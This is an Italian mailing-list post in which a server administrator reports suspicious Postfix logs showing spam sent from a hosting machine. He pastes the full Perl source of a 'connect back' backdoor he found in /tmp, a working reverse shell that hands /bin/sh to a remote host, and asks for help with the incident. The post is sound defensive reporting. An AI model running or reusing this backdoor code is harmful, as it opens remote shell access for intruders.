Maillog strano

Massimo Lusetti mlusetti a gmail.com
Ven 12 Gen 2007 16:14:25 CET


Su un server dove ci sono svariati domini hostati con possiblita` di
fare PHP e Perl ho trovato dei log del genere:

Jan 12 00:03:20 mailmx postfix/pickup[13388]: 8A1C82C90F: uid=80 from=<www>
Jan 12 00:03:20 mailmx postfix/smtpd[13706]: connect from
localhost.example.it[127.0.0.1]
Jan 12 00:03:20 mailmx postfix/cleanup[13663]: 8A1C82C90F:
message-id=<86a9f1d7bb78ab83ad6ff2d4e2e2a3ae a yahoo.com.br>
Jan 12 00:03:20 mailmx postfix/qmgr[170]: 8A1C82C90F:
from=<www a example.it>, size=4413, nrcpt=1 (queue active)
Jan 12 00:03:21 mailmx postfix/smtp[13710]: 8A1C82C90F:
to=<sux a nutecnet.com.br>, relay=127.0.0.1[127.0.0.1], delay=1,
status=sent (250 Ok: queued as 280A72C91F)

... e poi dopo che la storia si e` ripetuta piu` volte si finisce con ...

Jan 12 03:23:42 mailmx postfix/smtp[29188]: C01AB2C90D:
to=<sux a nutecnet.com.br>, relay=none, delay=12020, status=deferred
(connect to mx-psi02.terra.com.br[200.176.10.240]: server refused to
talk to me: 421 ta
lara.terra.com.br Error: too many connections from 86.212.173.88  )

Da una prima veloce, o per meglio dire superficiale, dei mille mila
file che ci sono nelle direcotry hostate non ho trovato niente ma in
/tmp ho trovato...

dc.txt ;) di www:wheel

#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  exec {'/bin/sh'} '-bash' . "\0" x 4;
  exit(0);
}
print "[*] Datached\n\n";



... fatalita` curl e` installato sulla macchina per una libreria PHP...


Ho visto anche che e` stata pubblicata un advisor per cacti e penso
che questo bel giochino mi sia arrivato sul server (in realta` il
server non e` mio ma questo poco conta... vi ho lasciato l'ip non
modificato sopra) con qualcosa di simile (cacti non e` installato).

Suggerimenti su come proseguire... credo di avere tempo fino a
stanotte quando il tutto ricomincera`.
Si perche` questo caro amico e` anche abbastanza furbetto... fa
partire i suoi bot quando qui (Italia) e` notte... partono sempre alle
00:03 con lo scarto di poche decine di sencondi...

A presto
-- 
Massimo
http://meridio.blogspot.com


Maggiori informazioni sulla lista varie